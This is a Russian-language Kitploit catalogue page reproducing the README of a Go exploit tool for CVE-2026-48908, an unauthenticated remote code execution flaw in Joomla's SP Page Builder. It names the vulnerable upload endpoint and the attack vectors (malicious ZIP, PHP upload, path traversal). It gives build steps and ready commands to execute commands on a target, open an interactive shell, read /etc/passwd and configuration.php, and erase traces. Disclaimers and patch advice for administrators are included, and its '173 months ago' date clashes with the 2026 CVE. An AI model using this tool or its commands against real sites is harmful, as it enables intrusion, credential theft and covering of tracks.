Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-48908-SP-Page-Builder-Joomla — CVE-2026-48908 — SP Page Builder для Joomla: неаутентифицированное удалённое выполнение кода | Kitploit
Инструменты/GitHubGitHub/gagaltotal/cve-2026-48908-sp-page-builder-joomla
Анализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubgagaltotal/cve-2026-48908-sp-page-builder-joomla

CVE-2026-48908-SP-Page-Builder-Joomla

CVE-2026-48908 — SP Page Builder для Joomla: неаутентифицированное удалённое выполнение кода

Репозиторий
173 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-48908: SP Page Builder Joomla Неаутентифицированное RCE

Доказательство концепции эксплуатации CVE-2026-48908, неаутентифицированной уязвимости удалённого выполнения кода в компоненте SP Page Builder для Joomla.

Обзор уязвимости

CVE-2026-48908 — критическая уязвимость безопасности, позволяющая неаутентифицированным злоумышленникам выполнять произвольный код на уязвимых установках Joomla из-за неправильной обработки извлечения ZIP-файлов в компоненте SP Page Builder.

Технические детали

  • CVE ID: CVE-2026-48908
  • Компонент: com_sppagebuilder
  • Уязвимые версии: <= 6.6.1
  • Исправленная версия: 6.6.2
  • Вектор атаки: Сетевой, без аутентификации
  • Оценка CVSS: Критическая
  • Тип уязвимости: Произвольная загрузка файлов / RCE через извлечение ZIP
  • Конечная точка атаки: index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon

Коренная причина

Уязвимость существует в функциональности загрузки ресурсов, где приложение неправильно проверяет и извлекает ZIP-файлы, содержащие иконки. Злоумышленник может создать вредоносный ZIP-файл с PHP-нагрузками, которые будут извлечены в веб-доступную директорию, что позволяет удалённо выполнять код.

Требования

  • Go версии 1.26.4 или новее
  • Сетевой доступ к целевой установке Joomla
  • Действительный целевой URL

Зависимости

  • golang.org/x/term — Утилиты терминала для безопасного ввода пароля

Установка

Из исходного кода

git clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go

Готовый бинарный файл

Скомпилированные бинарные файлы доступны в разделе релизов.

Использование

Screen Capture

Базовая команда выполнения

Screen Capture

./poc_tot -target http://target-site.com -cmd "whoami"

Интерактивная оболочка

./poc_tot -target http://target-site.com -shell

Оценка уязвимости

./poc_tot -target http://target-site.com -check

Очистка

./poc_tot -target http://target-site.com -cleanup

Использование пользовательского токена (если доступен)

./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"

Параметры командной строки

-target string
    URL-адрес уязвимой установки Joomla (обязательно)
    Пример: http://target.com или https://target.com

-cmd string
    Системная команда для выполнения на цели
    Пример: "cat /etc/passwd"

-shell
    Запустить интерактивную оболочку на цели (требуется успешная эксплуатация)

-check
    Проверить, уязвима ли цель, без попытки эксплуатации

-cleanup
    Удалить загруженную оболочку и артефакты с цели

-token string
    CSRF-токен для эксплуатации (необязательно, определяется автоматически, если не указан)

Методы эксплуатации

Инструмент поддерживает несколько векторов эксплуатации:

  1. Прямая загрузка PHP — Загрузка PHP-файлов напрямую в исполняемые пути
  2. Обход каталогов — Использование обхода каталогов для обхода ограничений
  3. Манипуляция архивами — Создание вредоносных ZIP-архивов со встроенными нагрузками
  4. Подмена расширения — Использование двойных расширений и вариантов регистра

Примеры

Разведка

./poc_tot -target http://vulnerable.local -check

Выполнение одной команды

./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"

Извлечение конфиденциальных файлов

./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"

Интерактивный доступ

./poc_tot -target http://vulnerable.local -shell
# В оболочке:
> id
> whoami
> pwd

Удаление следов

./poc_tot -target http://vulnerable.local -cleanup

Соображения безопасности

Для администраторов

Если вы используете Joomla с компонентом SP Page Builder:

  1. Немедленно обновитесь: Перейдите на SP Page Builder версии 6.6.2 или новее
  2. Отключите компонент: Если немедленное обновление невозможно, отключите com_sppagebuilder
  3. Мониторьте логи: Проверьте логи веб-сервера на подозрительную активность
  4. Ограничьте разрешения: Убедитесь в правильных правах доступа к веб-директориям
  5. Web Application Firewall: Установите правила WAF для блокировки попыток эксплуатации

Для исследователей безопасности

  • Используйте этот инструмент только на системах, которыми вы владеете или на которые имеете явное разрешение для тестирования
  • Сначала тестируйте в изолированных средах
  • Документируйте все находки соответствующим образом
  • Следуйте практике ответственного раскрытия
  • Не используйте для несанкционированного доступа

Отказ от ответственности

Это программное обеспечение предоставляется исключительно для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Авторы не несут ответственности за неправильное использование или ущерб, причинённый этим инструментом. Пользователи обязаны убедиться, что у них есть соответствующие полномочия перед использованием этого инструмента на любой целевой системе.

Используя этот инструмент, вы подтверждаете, что:

  • Вы будете использовать его только на системах, которыми владеете, или на которые имеете письменное разрешение для тестирования
  • Вы понимаете юридические последствия и принимаете полную ответственность
  • Авторы не несут ответственности за любой ущерб или юридические последствия
  • Вы будете соблюдать все применимые законы и правила

Юридическое уведомление

Этот инструмент предназначен исключительно для оборонительного исследования безопасности и авторизованного тестирования на проникновение. Несанкционированный доступ к компьютерным системам нарушает Computer Fraud and Abuse Act и аналогичные законы в других юрисдикциях. Всегда получайте письменное разрешение перед проведением тестирования безопасности.

Ссылки

  • Официальный центр безопасности Joomla: https://docs.joomla.org/Security_Checklist
  • SP Page Builder: https://www.sp-components.com/
  • Детали CVE-2026-48908: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48908

Меры по снижению риска

Немедленные действия

  1. Примените обновление безопасности до версии 6.6.2 или новее
  2. Если обновление недоступно, отключите компонент: index.php?option=com_installer&view=manage
  3. Проверьте журналы ошибок на предмет попыток эксплуатации
  4. Проверьте файловую систему на наличие подозрительных PHP-файлов в медиа-директориях

Долгосрочная безопасность

  1. Поддерживайте Joomla и все компоненты обновлёнными
  2. Внедрите автоматическое сканирование безопасности
  3. Используйте заголовки безопасности и правила WAF
  4. Мониторьте целостность файлов
  5. Регулярно создавайте резервные копии
  6. Применяйте принцип наименьших привилегий

Вклад

Приветствуются исследовательские вклады в области безопасности. Пожалуйста:

  1. Сообщайте об уязвимостях ответственно
  2. Следуйте существующему стилю кода
  3. Включайте подробную документацию
  4. Тщательно тестируйте перед отправкой

Автор

GhostGTR666 (Gagaltotal666)

  • GitHub: https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
  • Email: Контакт через GitHub

Журнал изменений

Версия 1.0.0

  • Первоначальный релиз
  • Поддержка нескольких векторов эксплуатации
  • Функциональность интерактивной оболочки
  • Проверка уязвимости и операции очистки

Поддержка

По вопросам, проблемам или вкладу:

  1. Проверьте существующие тикеты на GitHub
  2. Изучите сообщения об ошибках и логи
  3. Убедитесь, что целевой URL корректен и доступен
  4. Подтвердите наличие соответствующих разрешений перед тестированием
Скачать инструмент